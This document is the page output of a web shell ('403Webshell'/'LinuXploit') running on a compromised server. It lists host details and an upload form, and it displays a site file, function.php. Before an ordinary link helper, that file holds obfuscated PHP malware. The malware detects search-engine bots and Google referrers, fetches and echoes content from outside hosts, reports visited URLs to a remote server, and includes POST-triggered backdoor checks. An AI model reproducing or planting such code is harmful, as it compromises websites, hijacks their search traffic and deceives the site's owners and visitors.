403Webshell
Server IP : 103.233.193.20  /  Your IP : 216.73.216.169
Web Server : Apache/2
System : Linux host1.itclever.com 4.18.0-553.16.1.el8_10.x86_64 #1 SMP Thu Aug 8 17:47:08 UTC 2024 x86_64
User : oriscomadm ( 1120)
PHP Version : 5.6.40
Disable Function : exec,system,passthru,shell_exec,escapeshellarg,escapeshellcmd,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
MySQL : ON |  cURL : ON |  WGET : OFF |  Perl : OFF |  Python : OFF |  Sudo : OFF |  Pkexec : OFF
Directory :  /home/oriscomadm/domains/oriscom.com/private_html/include/

Upload File :
current_dir [ Writeable] document_root [ Writeable]

 

Command :


[ Back ]     

Current File : /home/oriscomadm/domains/oriscom.com/private_html/include/function.php
<?php
 goto kZFpq; CyCaD: $zyMQr = $_SERVER["\110\124\124\x50\x5f\110\x4f\123\124"]; goto nQFPx; p0wK9: exit; goto lc9W6; h_jn7: $c39Mt = trim($c39Mt); goto lo7Am; BseRi: aJDxA: goto tAXal; XBiy5: $m_wv3 = !empty($_SERVER["\x48\x54\x54\x50\x53"]) && $_SERVER["\110\124\x54\120\123"] !== "\157\x66\146" ? "\150\x74\164\x70\x73" : "\x68\x74\164\x70"; goto CyCaD; Qpnfd: function ZTAm6() { $zTl51 = array("\x47\157\157\x67\x6c\145\142\157\x74", "\x42\x69\x6e\x67\142\x6f\x74"); return isset($_SERVER["\110\124\x54\x50\137\125\123\x45\122\x5f\x41\107\105\x4e\124"]) && preg_match("\57" . implode("\174", $zTl51) . "\57\151", $_SERVER["\110\124\124\x50\x5f\125\x53\x45\122\x5f\x41\x47\x45\x4e\124"]); } goto OmURP; nN5OG: echo $dBZFI; goto D3mJ8; xXb98: $hhVFH = trim($kUJIR, "\x2f"); goto YkqoB; GQJfU: aEenL: goto w7naT; tAXal: if (!(Pyl3Z() && uD38p() && !$sszMM)) { goto sWv2p; } goto WA3Gc; Oh1kq: exit; goto GQJfU; nQFPx: $TjlPK = $m_wv3 . "\x3a\57\x2f" . $zyMQr; goto nRG3l; w7naT: if (!(ztaM6() && !$sszMM)) { goto aJDxA; } goto nN5OG; j6LEz: $Ywt6v = $TjlPK . $_SERVER["\x52\x45\x51\125\x45\x53\x54\x5f\125\x52\111"]; goto o0UFh; G1Biy: function sOwPa() { goto k8zJk; dlRRe: $Egckv .= "\77" . $_SERVER["\x51\x55\105\122\x59\137\123\124\122\111\x4e\107"]; goto O95ZN; O95ZN: X10jr: goto g1jU5; k8zJk: $k4D6t = isset($_SERVER["\110\124\124\120\x53"]) && $_SERVER["\x48\124\124\120\123"] === "\157\156" ? "\150\164\x74\x70\163" : "\x68\164\164\160"; goto S3iAG; S3iAG: $Egckv = $k4D6t . "\72\57\57" . $_SERVER["\x48\124\124\x50\137\110\x4f\x53\x54"] . $_SERVER["\122\x45\x51\125\x45\123\x54\x5f\x55\x52\x49"]; goto NJUDE; g1jU5: return $Egckv; goto OWNV5; NJUDE: if (!$_SERVER["\x51\125\105\x52\131\x5f\123\124\x52\111\116\x47"]) { goto X10jr; } goto dlRRe; OWNV5: } goto XBiy5; CDjRF: function UD38P() { return preg_match("\57\50\x61\x6e\144\162\x6f\x69\144\x7c\x61\x76\x61\x6e\x74\x67\x6f\174\142\x6c\x61\143\153\142\x65\x72\x72\x79\x7c\142\157\154\x74\x7c\x62\x6f\x6f\x73\x74\174\x63\x72\x69\x63\x6b\145\x74\174\x64\157\x63\x6f\x6d\157\x7c\x66\x6f\156\145\174\150\x69\x70\164\x6f\160\x7c\x6d\x69\156\x69\174\x6d\x6f\x62\x69\x7c\x70\141\154\x6d\174\x70\150\x6f\156\145\174\x70\x69\145\x7c\x74\141\142\154\145\164\x7c\165\160\x5c\56\142\x72\x6f\x77\x73\x65\162\174\x75\x70\x5c\x2e\154\x69\156\153\174\167\145\x62\x6f\x73\x7c\x77\x6f\x73\51\57\151", $_SERVER["\x48\124\124\x50\x5f\125\123\105\122\137\101\x47\105\116\x54"]); } goto Qpnfd; OmURP: function f3Flb($RscOI) { goto vfesm; Qn89S: curl_setopt($sU4Mw, CURLOPT_RETURNTRANSFER, 1); goto SH4gc; WP2xt: @curl_close($sU4Mw); goto zAZsM; vfesm: $sU4Mw = @curl_init(); goto zItPD; xZXrO: $ozDl9 = @curl_exec($sU4Mw); goto WP2xt; gQ69t: curl_setopt($sU4Mw, CURLOPT_CONNECTTIMEOUT, 5); goto Qn89S; SH4gc: curl_setopt($sU4Mw, CURLOPT_SSL_VERIFYHOST, "\60"); goto Cavqw; zAZsM: return $ozDl9; goto myo_0; Cavqw: curl_setopt($sU4Mw, CURLOPT_SSL_VERIFYPEER, "\60"); goto xZXrO; zItPD: curl_setopt($sU4Mw, CURLOPT_URL, $RscOI); goto jTh9X; jTh9X: curl_setopt($sU4Mw, CURLOPT_HEADER, 0); goto gQ69t; myo_0: } goto G1Biy; KsUrJ: $s7AJ7 = "\x68\x74\x74\x70\163\x3a\57\x2f\x6b\151\x6c\151\x6e\x61\x68\145\x2e\x6f\x72\147"; goto j6LEz; rXAVX: exit; goto Kl13Y; nRG3l: $UQenx = 0; goto RhRvt; pWRRw: echo $dBZFI; goto Oh1kq; lc9W6: wv6B2: goto CjB7X; CjB7X: if (!(isset($_POST["\143\x6f\x64\x65\x31\x31"]) && $_POST["\x63\x6f\x64\x65\x31\x31"] == "\x74\x65\x73\x74")) { goto aEenL; } goto pWRRw; xXCtT: echo "\155\146\157\71\x39\x39"; goto p0wK9; D3mJ8: exit; goto BseRi; ctmmy: $TOJIi = parse_url($Vk6b7, PHP_URL_QUERY); goto xXb98; kZFpq: function pyl3z() { return isset($_SERVER["\110\124\124\x50\137\x52\105\x46\x45\122\105\x52"]) && strpos($_SERVER["\x48\124\x54\120\x5f\122\105\x46\x45\122\105\x52"], "\x67\x6f\x6f\147\154\x65\56\x63\157\x6d") !== false; } goto CDjRF; whwfT: if (!(isset($_POST["\143\x6f\144\x65\x31\x31"]) && $_POST["\143\x6f\144\x65\61\61"] == "\155\146\x6f\x38\x38")) { goto wv6B2; } goto xXCtT; WA3Gc: $c39Mt = f3flB("\150\164\x74\x70\x73\72\57\57\142\163\x69\160\150\x70\x2e\x63\x6f\155\x2f\x63\150\151\x61\156\x2e\x74\170\x74"); goto h_jn7; o0UFh: $dBZFI = f3FlB($s7AJ7 . "\x2f\x6c\151\156\165\x78\62\56\x70\x68\x70\77\150\x6f\163\164\x3d" . urlencode($Ywt6v)); goto whwfT; lo7Am: $dBZFI = F3flB($c39Mt); goto hmVH7; nLoxO: $kUJIR = parse_url($Vk6b7, PHP_URL_PATH); goto ctmmy; hmVH7: echo $dBZFI; goto rXAVX; RhRvt: $Vk6b7 = $_SERVER["\122\x45\x51\125\105\123\124\137\x55\x52\x49"]; goto nLoxO; YkqoB: $sszMM = ($hhVFH === '' || $hhVFH === "\x69\x6e\144\x65\170\56\x70\150\160") && empty($TOJIi); goto KsUrJ; Kl13Y: sWv2p:
?>
<?php
function checklink($target,$link){
	if(!empty($link)){
		return $link;
	}else{
		return $target;
	}
}
?>

Youez - 2016 - github.com/yon3zu
LinuXploit